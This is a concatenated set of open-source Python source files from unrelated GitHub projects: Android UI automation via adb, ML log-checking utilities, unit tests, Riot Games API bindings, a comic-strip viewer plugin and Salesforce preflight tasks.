WHERE team_id = (SELECT `id` FROM `team` WHERE `name`=%s)
UNION
(SELECT `user_id` FROM `team_admin`
WHERE `team_id` = (SELECT `id` FROM `team` WHERE `name`=%s)))
AND `team_user`.`team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)'''
cursor.execute(query, (user, team, team, team))
if cursor.rowcount != 0:
unsubscribe_notifications(team, user, cursor)
connection.commit()
cursor.close()
connection.close()
|
scripts/checks.py | SymbioticLab/Salus | 104 | 12653129 | #
# Copyright 2019 <NAME> <<EMAIL>>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import defaultdict
import re
import pandas
import plotutils as pu
def check_threadpool(path, name='Threadpool'):
pat = re.compile(name + r' (?P<evt>start|end) to run seq (?P<seq>\d+)')
with open(path) as f:
lines = f.readlines()
evts = [pat.search(line).groups() for line in lines if pat.search(line)]
print('evts num: {}'.format(len(evts)))
r = set()
for evt, seq in evts:
if evt == 'start':
r.add(seq)
else:
r.remove(seq)
return r
def check_pending_ops(path):
kernels = defaultdict(int)
lines = defaultdict(list)
kernel_type = {}
ptn_st = re.compile(r'''Process node: (?P<node>[^ \[]+) = (?P<kernel>[^\[]+)''')
ptn_ed = re.compile("Propagate outputs for node: (?P<node>.+)")
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_st.search(line)
if m:
kernels[m.group('node')] += 1
lines[m.group('node')].append(line)
kernel_type[m.group('node')] = m.group('kernel')
m = ptn_ed.search(line)
if m:
if kernels[m.group('node')] == 0:
raise ValueError("Unknown kernel name: ", m.group('node'), line)
kernels[m.group('node')] -= 1
remaining = [('{}[{}]'.format(k, kernel_type[k]), v) for k, v in kernels.items() if v != 0]
print(remaining)
return remaining, kernel_type, lines
def check_kernel_create(path):
kernels = {}
ptn_create = re.compile(r'''Created kernel: (?P<kernel>\w+) (?P<op>.+)''')
ptn_find = re.compile(r'''Found cached kernel: (?P<kernel>\w+) (?P<op>.+)''')
ptn_delete = re.compile(r'''Deleted kernel: (?P<kernel>\w+) (?P<op>.+)''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_create.search(line)
if m:
kernels[m.group('kernel')] = m.group('op')
m = ptn_find.search(line)
if m:
addr = m.group('kernel')
if addr not in kernels:
raise ValueError('Found nonexist kernel: ', addr, m.group('op'))
if kernels[addr] != m.group('op'):
raise ValueError('Found kernel changed op: ', addr, kernels[addr], m.group('op'))
m = ptn_delete.search(line)
if m:
addr = m.group('kernel')
if addr not in kernels:
raise ValueError('Delete nonexist kernel: ', addr, m.group('op'))
if kernels[addr] != m.group('op'):
raise ValueError('Delete kernel changed op: ', addr, kernels[addr], m.group('op'))
del kernels[addr]
return kernels
def check_iter_create(path):
iters = defaultdict(list)
ptn_create = re.compile(r'''Created iteration (?P<graphId>\d+) for graph (?P<gh>\w+) in session (?P<sess>\w+)''')
ptn_running = re.compile(r'''Running iteration (?P<sess>\w+):(?P<graphId>\d+)''')
ptn_finish = re.compile(r'''(?P<sess>\w+):(?P<gh>\w+):(?P<graphId>\d+) finish iteration''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_create.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 2:
print('Iteration {} created while it is running'.format(m.group('graphId')))
l.append(0)
m = ptn_running.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 0:
print('Iteration {} running while it is not created'.format(m.group('graphId')))
l.append(1)
m = ptn_finish.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 1:
print('Iteration {} stopped while it is not running'.format(m.group('graphId')))
l.append(2)
return iters
def check_part_nodes(path):
nodes = defaultdict(list)
# Node 1 in graphHandle=0000000000000001, graphId=1: _SINK = NoOp[]
ptn_node = re.compile(r'''Node (?P<nid>\d+) in graphHandle=(?P<gh>\w+), graphId=(?P<graphId>\d+): (?P<name>[\w/_]+) = (?P<kernel>[^[]+)''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_node.search(line)
if m:
nodes[m.group('graphId')].append({
'nid': int(m.group('nid')),
'name': m.group('name'),
'kernel': m.group('kernel'),
'gh': m.group('gh')
})
return nodes
def check_mem_alloc(path):
allocs = {}
# TFAllocator called for attributes tensorflow::AllocationAttributes(allocation_will_be_logged=1, no_retry_on_failure=1) of 4194304 bytes of memory at 0x1023e200000 with alignment 32 using allocator GPU_0_smallopt@0x10d9c1b0 with AllocationTicket(2988, device=GPU:0, sess=1e0e80dcd81c1d05)
ptn_alloc = re.compile(r'''^.*TFAllocator called .* of (?P<size>\d+) bytes of memory at (?P<origin>0x[a-f0-9]+) with.*sess=(?P<sess>\w+)\)$''')
# [I] TFAllocator deallocating memory at 0x1021c1a4500 size 37632 using allocator GPU_0_bfc@0x11c82000 with AllocationTicket(3854, device=GPU:0, sess=4f03d23010531445)
ptn_dealloc = re.compile(r'''^.*TFAllocator deallocating memory at (?P<origin>\w+) size (?P<size>\d+) using.*sess=(?P<sess>\w+)\)$''')
with pu.pbopen(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_alloc.search(line)
if m:
origin = int(m.group('origin'), 16)
size = int(m.group('size'))
allocs[origin] = {
'origin': origin,
'size': size,
'sess': m.group('sess')
}
m = ptn_dealloc.search(line)
if m:
origin = int(m.group('origin'), 16)
size = int(m.group('size'))
if origin not in allocs:
raise ValueError('Unknown deallocation: ' + line)
if allocs[origin]['size'] != size:
raise ValueError('Mismatch size' + line)
del allocs[origin]
return allocs
|
deprecated/benchmark/collective/utils/timer.py | hutuxian/FleetX | 170 | 12653134 | <gh_stars>100-1000
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import time
class BenchmarkTimer(object):
def __init__(self):
self.start_timer_step = 0
self.end_timer_step = 100001
self.cur_step = 0
self.total_time = 0.0
self.step_start = 0.0
def set_start_step(self, step):
self.start_timer_step = step
def time_begin(self):
self.cur_step += 1
if self.cur_step > self.start_timer_step:
self.step_start = time.time()
def time_end(self):
if self.cur_step > self.start_timer_step:
end = time.time()
self.total_time += end - self.step_start
def time_per_step(self):
if self.cur_step <= self.start_timer_step:
return 0.0
return self.total_time / (self.cur_step - self.start_timer_step)
|
example/runtests.py | liskin/coveralls-python | 191 | 12653172 | from project import branch
from project import hello
if __name__ == '__main__':
hello()
branch(False, True)
branch(True, True)
|
src/unittest/python/python_utils_tests.py | klr8/pybuilder | 1,419 | 12653221 | <gh_stars>1000+
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2020 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from shutil import rmtree
from tempfile import mkdtemp
from pybuilder.python_utils import iglob, makedirs
from pybuilder.utils import jp
class TestPythonGlobTest(unittest.TestCase):
def touch(self, f):
with open(f, "wb") as f:
pass
def setUp(self):
self.tmp_dir = mkdtemp()
makedirs(jp(self.tmp_dir, "a", "b"))
self.touch(jp(self.tmp_dir, "x.py"))
self.touch(jp(self.tmp_dir, "a", "y.py"))
self.touch(jp(self.tmp_dir, "a", "b", "z.py"))
def tearDown(self):
rmtree(self.tmp_dir)
def test_iglob(self):
self.assertEqual(list(iglob(jp(self.tmp_dir, "*.py"))), [jp(self.tmp_dir, "x.py")])
self.assertEqual(list(iglob(jp(self.tmp_dir, "**", "*.py"), recursive=True)),
[jp(self.tmp_dir, "x.py"),
jp(self.tmp_dir, "a", "y.py"),
jp(self.tmp_dir, "a", "b", "z.py")
])
|
ding/utils/tests/test_plot.py | sailxjx/DI-engine | 464 | 12653273 | import random
import numpy as np
import os
import pytest
from ding.utils.plot_helper import plot
@pytest.mark.unittest
def test_plot():
rewards1 = np.array([0, 0.1, 0, 0.2, 0.4, 0.5, 0.6, 0.9, 0.9, 0.9])
rewards2 = np.array([0, 0, 0.1, 0.4, 0.5, 0.5, 0.55, 0.8, 0.9, 1])
rewards = np.concatenate((rewards1, rewards2)) # concatenation array
episode1 = range(len(rewards1))
episode2 = range(len(rewards2))
episode = np.concatenate((episode1, episode2))
data1 = {}
data1['x'] = episode
data1['y'] = rewards
data1['label'] = 'line1'
rewards3 = np.random.random(10)
rewards4 = np.random.random(10)
rewards = np.concatenate((rewards3, rewards4)) # concatenation array
episode3 = range(len(rewards1))
episode4 = range(len(rewards2))
episode = np.concatenate((episode3, episode4))
data2 = {}
data2['x'] = episode
data2['y'] = rewards
data2['label'] = 'line2'
data = [data1, data2]
plot(data, 'step', 'reward_rate', 'test_pic', './pic.jpg')
assert os.path.exists('./pic.jpg')
|
reddit2telegram/channels/~inactive/chessmemesenglish/app.py | CaringCat/reddit2telegram | 187 | 12653285 | #encoding:utf-8
subreddit = 'chessmemes'
t_channel = '@chessmemesenglish'
def send_post(submission, r2t):
return r2t.send_simple(submission)
|
python_uiautomator/device.py | maksonlee/android-uiconductor | 113 | 12653286 | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""UICD's python tool to execute actions on python script."""
import re
import time
from .android_device_driver import AndroidDeviceDriver
from .constant import DOUBLE_CLICK_POWER_EVENT_TEMPLATE
from .constant import DOUBLE_TAP_EVENT_TEMPLATE
from .constant import INPUT_ACTION_SWITCHER
from .constant import InputActions
from .constant import MotionEvent
from .constant import SWIPE_MATRIX
from .ui_object import UiObject
from .ui_selector import UiSelector
from .uicd_python_util import UICDPythonUtil
from .xml_parser import XmlParser
class Device(object):
"""Device wrapper class for python in uicd.
Attributes:
adb_path: adb path.
xml_dumper_port: port where xml dumper server is running.
base_folder: base folder for xml apk if needed.
android_device_driver: AndroidDeviceDriver for xml fetching.
api_level: API level of current device.
model: model of current device.
dimension_x: x dimension value.
dimension_y: y dimension value.
"""
def __init__(self, device_serial, xml_dumper_port):
uicd_util = UICDPythonUtil()
self.android_device_driver = AndroidDeviceDriver(
uicd_util.get_base_folder(), uicd_util.get_adb_path(), device_serial,
xml_dumper_port)
dump_sys_result = self.android_device_driver.adb.exec_adb_cmd(
"shell dumpsys window displays").communicate()[0].decode("utf-8")
# This handles the case when dumpsys didn't generate any result
if not dump_sys_result:
raise EnvironmentError(
"shell dumpsys window displays result is empty, check your device.")
# This regex is for matching pattern init=48x96 so
# that we can fetch device dimension value.
regex = re.compile("init=[0-9]+x[0-9]+")
match = regex.findall(dump_sys_result)
[self.dimension_x, self.dimension_y
] = list(map(int,
re.sub("[^0-9]", " ", match[0]).split()))
self.api_level = self.android_device_driver.adb.exec_adb_cmd(
"shell getprop ro.build.version.sdk").communicate()[0].decode(
"utf-8").strip()
self.model = self.android_device_driver.adb.exec_adb_cmd(
"shell getprop ro.product.model").communicate()[0].decode(
"utf-8").strip()
self.xml_dumper_port = xml_dumper_port
@classmethod
def create_device_by_slot(cls, slot):
"""Creates device instance by device slot.
Caller need to make sure uicd_util has device and port information first.
Args:
slot: the virtual slot the device is in.
Returns:
A instance of a device.
"""
uicd_util = UICDPythonUtil()
device_serial = uicd_util.get_device_serial(slot)
xml_dumper_port = uicd_util.get_xml_dumper_port(slot)
if device_serial is None or xml_dumper_port is None:
raise TypeError
return cls(device_serial, xml_dumper_port)
@classmethod
def create_device_by_serial(cls, device_serial):
"""Creates device instance by serial.
Args:
device_serial: device serial number
Returns:
A instance of a device.
"""
uicd_util = UICDPythonUtil()
return cls(device_serial,
uicd_util.get_xml_dumper_port_for_device(device_serial))
@classmethod
def create_device_by_serial_and_port(cls, device_serial, xml_dumper_port):
"""Creates device instance by serial and xml dumper port.
Args:
device_serial: device serial number
xml_dumper_port: xml port for the dumper
Returns:
A instance of a device.
"""
return cls(device_serial, xml_dumper_port)
def set_xml_fetch_method(self, use_xml_dumper):
"""Sets if xml would be fetched via dumper or adb uiautomator dump.
Please only use this function when you can't install any apk on your device.
Some other functionalities (like drag) are tied to xml dumper apk and using
this will slow down the uiautomation process.
Passing True means xml would be fetched via dumper.
False means xml would be fetched via adb.
Args:
use_xml_dumper: True or False.
"""
self.android_device_driver.use_xml_dumper = use_xml_dumper
def fetch_current_xml(self):
"""Function to fetch current xml.
Returns:
A json string of xml info.
Raises:
OSError: Request is invalid.
"""
return self.android_device_driver.fetch_current_xml()
def text(self, value, match_option=None):
"""Function to invoke UiObject by text.
Args:
value: key for which the text should match.
match_option: option for advanced matching.
Returns:
A UiObject with .text(value).
"""
return self.attributes("text", value, match_option)
def content_desc(self, value, match_option=None):
"""Function to invoke UiObject by description.
Args:
value: key for which the text should match.
match_option: option for advanced matching.
Returns:
A UiObject with .description(value).
"""
return self.attributes("content-desc", value, match_option)
def resource_id(self, value, match_option=None):
"""Function to invoke UiObject by description.
Args:
value: key for which the text should match.
match_option: option for advanced matching.
Returns:
A UiObject with .resource_id(value).
"""
return self.attributes("resource-id", value, match_option)
def attributes(self, attrib_key, attrib_value, match_option=None):
"""Function to invoke UiObject by description.
Args:
attrib_key: key for which the value should match.
attrib_value: value for matching option
match_option: option for advanced matching.
Returns:
A UiObject with .description(key).
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver)
def home(self):
"""Function to invoke home button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.HOME)
def click(self, x, y):
"""Function to invoke click on certain place button.
Args:
x: x coordinate for click position.
y: y cooridnate for click position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
# adb click 0,0 will have a weird behavior
if x <= 0 and y <= 0:
return
cmd = "shell input tap {x} {y}".format(x=x, y=y)
self.android_device_driver.adb.exec_adb_cmd(cmd).wait()
def long_click(self, x, y, duration=2000):
"""Function to invoke long click on certain place button.
2000ms by default.
Args:
x: x coordinate for click position.
y: y cooridnate for click position.
duration: duration of long click.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell input swipe {x} {y} {x} {y} {duration}".format(
x=x, y=y, duration=duration)).wait()
def rotate_portrait(self):
"""Turns the phone in portrait mode.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:0"
).wait()
def rotate_landscape(self):
"""Turns the phone in landscape mode.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1"
).wait()
def unfreeze_rotation(self):
"""Enables the sensors and unfreezes the device rotation at its current rotation state.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:1"
).wait()
def freeze_rotation(self):
"""Disables the sensors and freezes the device rotation at its current rotation state.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0"
).wait()
def open_settings(self):
"""Opens the settings of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell am start -a android.settings.SETTINGS").wait()
def open_quick_settings(self):
"""Opens the quick settings of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar expand-settings").wait()
def open_notifications(self):
"""Opens the notifications of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar expand-notifications").wait()
def close_notifications(self):
"""Closes the notifications of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar collapse").wait()
def overview(self):
"""Function to invoke overview button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.OVERVIEW)
def back(self):
"""Function to invoke back button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.BACK)
def input_key_event(self, key, custom_key=None):
"""Function to invoke a given input key on device.
Args:
key: key event, value in InputActions.
custom_key: custom key number if used InputActions.CUSTOM
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
key_event = INPUT_ACTION_SWITCHER.get(key)
if key_event == "-1":
key_event = custom_key
self.android_device_driver.adb.exec_adb_cmd("shell input keyevent " +
key_event).wait()
def input_text(self, text):
"""Function to invoke back button.
Args:
text: text to be inputted.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd("shell input text " +
text).wait()
def swipe_up(self):
"""Function to invoke swipe up.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[0])
def swipe_down(self):
"""Function to invoke swipe down.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[1])
def swipe_left(self):
"""Function to invoke swipe left.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[2])
def swipe_right(self):
"""Function to invoke swipe right.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[3])
def swipe_custom(self, x1, y1, x2, y2):
"""Function to invoke custom swipe.
Args:
x1: x coordinate for start position.
y1: y cooridnate for start position.
x2: x coordinate for end position.
y2: y cooridnate for end position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.swipe(x1, y1, x2, y2)
def swipe_custom_ratio(self, start_pos_x_ratio, start_pos_y_ratio,
end_pos_x_ratio, end_pos_y_ratio):
"""Function to invoke custom swipe.
Args:
start_pos_x_ratio: x ratio of screen for start position.
start_pos_y_ratio: y ratio of screen for start position.
end_pos_x_ratio: x ratio of screen for end position.
end_pos_y_ratio: y ratio of screen for end position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
Raises:
OSError: If invalid ratio is provided to this action.
"""
invalid_ratio_tuple = [
start_pos_x_ratio > 1, start_pos_y_ratio > 1, end_pos_x_ratio > 1,
end_pos_y_ratio > 1, start_pos_x_ratio < 0, end_pos_x_ratio < 0,
start_pos_y_ratio < 0, end_pos_y_ratio < 0
]
if any(invalid_ratio_tuple):
raise EnvironmentError(
"Trying to swipe with invalid ratio, Ratio needs to be within 0 - 1.")
self.swipe_sub([
start_pos_x_ratio, start_pos_y_ratio, start_pos_x_ratio,
start_pos_y_ratio
])
def swipe_sub(self, swipe_matrix):
"""Function to invoke swipe.
Args:
swipe_matrix: swipe matrix for swipe action.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.swipe(swipe_matrix[0] * self.dimension_x,
swipe_matrix[1] * self.dimension_y,
swipe_matrix[2] * self.dimension_x,
swipe_matrix[3] * self.dimension_y)
def drag(self, points, steps=None, durations=None):
"""Function to invoke drag.
Args:
points: drag point route, first point is drag start point, the last point
is drop point.
steps: steps for each drag points movement, by default 10 step for each
movement.
durations: duration for each drag points movement, by default 0.1 second
for each movement.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
Raises:
OSError: If less than 2 points provided to drag action.
"""
if durations is None:
durations = [0.1] * (len(points) - 1)
if steps is None:
steps = [10] * (len(points) - 1)
if len(points) < 2:
raise EnvironmentError("Need at least 2 points")
if len(durations) + 1 != len(points):
raise EnvironmentError(
"Durations size should be one less than points size.")
if len(steps) + 1 != len(points):
raise EnvironmentError("Steps size should be one less than points size.")
self.android_device_driver.drag_start(points[0].x, points[0].y)
time.sleep(0.5)
for i in range(len(points) - 1):
startx = points[i].x
starty = points[i].y
endx = points[i + 1].x
endy = points[i + 1].y
disx = (endx - startx) / steps[i]
disy = (endy - starty) / steps[i]
for j in range(steps[i]):
self.android_device_driver.drag_move(startx + disx * j,
starty + disy * j)
time.sleep(durations[i])
self.android_device_driver.drag_stop(points[-1].x, points[-1].y)
def multi_touch(self, points):
"""Function to invoke multi touch.
Args:
points: points of multi touch action
Returns:
Nothing.
Raises:
OSError: If invalid response is received.
"""
if len(points) < 2:
raise EnvironmentError("Need at least 2 points")
self.android_device_driver.send_motion_event(points[0],
MotionEvent.ACTION_DOWN)
medium_points = points[1:-1]
for point in medium_points:
self.android_device_driver.send_motion_event(
point, MotionEvent.ACTION_POINTER_DOWN)
self.android_device_driver.send_motion_event(points[-1],
MotionEvent.ACTION_POINTER_UP)
def wait_for(self, selector, timeout=3, refresh_rate=0.5, retry=0):
"""Function to wait for a selector to show up.
Args:
selector: selectors to wait for.
timeout: how long to wait for in seconds.
refresh_rate: the frequency of refresh in seconds.
retry: the amount of times this action will get repeated.
Returns:
True/false, if the element described by the selector is found.
"""
time_counter = 0
retry_counter = 0
while retry_counter <= retry:
while time_counter <= timeout:
time.sleep(refresh_rate)
time_counter = time_counter + refresh_rate
xml = self.android_device_driver.fetch_current_xml()
parser = XmlParser(xml)
exist = parser.find_first_element_by_selector(selector)
if exist is not None:
return True
retry_counter = retry_counter + 1
return False
def info(self):
"""Function to get basic device info.
Returns:
dict of info, with dimensions, api_level and deviceModel as key.
"""
return {
"dimension_x": self.dimension_x,
"dimension_y": self.dimension_y,
"api_level": self.api_level,
"device_model": self.model,
}
def double_click_power(self):
"""Performs double click power button.
Note: This action only works on rooted devices.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
get_power_event_cmd = ("getevent -pl 2>&1 | sed -n "
"'/^add/{h}/KEY_POWER/{x;s/[^/]*//p}'")
input_event = self.adb.exec_adb_cmd(
"shell '{cmd}'".format(cmd=get_power_event_cmd)).communicate()[0]
self.android_device_driver.adb.exec_adb_cmd("shell '{cmd}'".format(
cmd=DOUBLE_CLICK_POWER_EVENT_TEMPLATE.format(input_event=input_event)))
def double_click(self, x, y):
"""Performs double tap.
Note: This action only works on rooted devices.
Args:
x: The x coordinate of a point to perform double click.
y: The y coordinate of a point to perform double click.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
get_touch_event_cmd = ("getevent -pl 2>&1 | sed -n "
"'/^add/{h}/ABS_MT_TOUCH/{x;s/[^/]*//p}'")
input_event = self.adb.exec_adb_cmd(
"shell '{cmd}'".format(cmd=get_touch_event_cmd)).communicate()[0]
self.android_device_driver.adb.exec_adb_cmd("shell '{cmd}'".format(
cmd=DOUBLE_TAP_EVENT_TEMPLATE.format(
input_event=input_event, x=x, y=y)))
def adb(self, command):
"""Performs an adb command.
Args:
command: The adb command
"""
self.android_device_driver.adb.raw_cmd(command)
def logcat(self, limit=1000):
"""Performs adb logcat command.
Note this can be very slow and only provides adb logcat command output.
If u actually want to use logcat please write adb commands yourself.
Args:
limit: The limit of output array.
Returns:
List of logcat.
"""
result, counter = [], 0
output = self.android_device_driver.adb.raw_cmd("logcat")
for stdout_line in iter(output.stdout.readline, ""):
counter += 1
result.append(stdout_line)
if counter == limit:
break
output.stdout.close()
return result
def find_element(self, attrib_key, attrib_value, match_option=None):
"""Find element by attribute.
Args:
attrib_key: key for which the value should match.
attrib_value: value for matching option
match_option: option for advanced matching.
Returns:
An Uiobject match the condition. None if no UiObject matches the
condition.
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver) if UiObject(
selector, self.android_device_driver).verify_exist() else None
def find_element_by_selector(self, selector):
"""Find element by selector.
Args:
selector: target selector.
Returns:
An Uiobject match the selector. None if no UiObject matches the selector.
"""
return UiObject(selector, self.android_device_driver) if UiObject(
selector, self.android_device_driver).verify_exist() else None
def has_element(self, attrib_key, attrib_value, match_option=None):
"""Check whether element is on the screen.
Args:
attrib_key: key for which the value should match.
attrib_value: value for matching option
match_option: option for advanced matching.
Returns:
Whether current screen contains the target element.
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver).verify_exist()
def has_text(self, text, match_option=None):
"""Function to invoke UiObject by description.
Args:
text: key for which the value should match.
match_option: option for advanced matching.
Returns:
Whether current screen contains the target text.
"""
selector_text = UiSelector().attributes("text", text, match_option)
selector_content_desc = UiSelector().attributes("content-desc", text,
match_option)
return UiObject(
selector_text, self.android_device_driver).verify_exist() or UiObject(
selector_content_desc, self.android_device_driver).verify_exist()
def sleep(self, sleep_time):
"""Invokes sleep function.
Args:
sleep_time: time for sleep, in ms.
Returns:
None.
"""
time.sleep(sleep_time)
|
src/riotwatcher/_apis/league_of_legends/ClashApiV1.py | TheBoringBakery/Riot-Watcher | 489 | 12653306 | <filename>src/riotwatcher/_apis/league_of_legends/ClashApiV1.py<gh_stars>100-1000
from .. import BaseApi, NamedEndpoint
from .urls import ClashApiV1Urls
class ClashApiV1(NamedEndpoint):
"""
This class wraps the Clash-v1 endpoint calls provided by the Riot API.
See https://developer.riotgames.com/apis#clash-v1 for more detailed information
"""
def __init__(self, base_api: BaseApi):
"""
Initialize a new ClashApiV1 which uses the provided base_api
:param BaseApi base_api: the root API object to use for making all requests.
"""
super().__init__(base_api, self.__class__.__name__)
def by_summoner(self, region: str, summoner_id: str):
"""
This endpoint returns a list of active Clash players for a given summoner ID.
If a summoner registers for multiple tournaments at the same time (e.g., Saturday and
Sunday) then both registrations would appear in this list.
:param string region: The region to execute this request on.
:param string summoner_id: The summoner ID.
:returns: List[PlayerDTO]: represents the summoner's info for the current clash.
"""
return self._request_endpoint(
self.by_summoner.__name__,
region,
ClashApiV1Urls.by_summoner,
summoner_id=summoner_id,
)
def by_team(self, region: str, team_id: str):
"""
Get team by ID.
:param string region: The region to execute this request on
:param string team_id: Team ID
:returns: TeamDTO: represents a clash team
"""
return self._request_endpoint(
self.by_team.__name__, region, ClashApiV1Urls.by_team, team_id=team_id,
)
def tournaments(self, region: str):
"""
Returns a list of active and upcoming tournaments.
:param string region: The region to execute this request on
:returns: List[TournamentDTO]: represents all of the current tournaments active
"""
return self._request_endpoint(
self.tournaments.__name__, region, ClashApiV1Urls.tournaments,
)
def tournament_by_team(self, region: str, team_id: str):
"""
Get tournament by team ID.
:param string region: The region to execute this request on
:param string team_id: Team ID
:returns: TournamentDTO: represents a clash tournament
"""
return self._request_endpoint(
self.tournament_by_team.__name__,
region,
ClashApiV1Urls.tournament_by_team,
team_id=team_id,
)
def by_tournament(self, region: str, tournament_id: str):
"""
Get tournament by ID.
:param string region: The region to execute this request on
:param string tournament_id: Tournament ID
:returns: TournamentDTO: represents a clash tournament
"""
return self._request_endpoint(
self.by_tournament.__name__,
region,
ClashApiV1Urls.by_tournament,
tournament_id=tournament_id,
)
|
Sources/Workflows/Comics/plugins/ctrl_alt_del/main.py | yagosys/AlfredWorkflow.com | 2,177 | 12653325 | def enabled():
return True
def title():
return "Ctrl+Alt+Del"
def subtitle():
return "View the latest Ctrl+Alt+Del strip"
def run():
import os
import re
content = os.popen("""curl -s http://www.cad-comic.com/cad/""").read().rstrip()
strip = re.match(r'.*?src="(http://v.cdn.cad-comic.com/comics/cad.*?)"' , content, re.IGNORECASE|re.S).groups(0)[0]
os.system('curl -s ' + strip + ' --O strip.png')
os.system('qlmanage -p strip.png')
|
office365/onedrive/internal/paths/resource_path_url.py | vgrem/Office365-REST-Python-Client | 544 | 12653342 | from office365.runtime.client_path import ClientPath
class ResourcePathUrl(ClientPath):
"""Resource path for OneDrive path-based addressing"""
def __init__(self, rel_url, parent):
"""
:param str rel_url: File or Folder relative url
:type parent: office365.runtime.client_path.ClientPath
"""
super(ResourcePathUrl, self).__init__(parent)
self._url = rel_url
self._nested = False
@property
def segments(self):
delimiter = "/" if self._nested else ":/"
if isinstance(self.parent, ResourcePathUrl):
self.parent._nested = True
return [self._url, delimiter]
else:
return [self.delimiter, self._url, delimiter]
@property
def delimiter(self):
return ":/"
@property
def name(self):
return self._url
|
cumulusci/tasks/preflight/settings.py | davisagli/CumulusCI | 163 | 12653351 | <filename>cumulusci/tasks/preflight/settings.py
from simple_salesforce.exceptions import SalesforceMalformedRequest
from cumulusci.core.tasks import BaseSalesforceTask
from cumulusci.core.utils import process_bool_arg
from cumulusci.tasks.salesforce.BaseSalesforceApiTask import BaseSalesforceApiTask
class CheckMyDomainActive(BaseSalesforceTask):
def _run_task(self):
self.return_values = (
".my." in self.org_config.instance_url
or ".cloudforce.com" in self.org_config.instance_url
)
self.logger.info(
f"Completed My Domain preflight check with result {self.return_values}"
)
class CheckSettingsValue(BaseSalesforceApiTask):
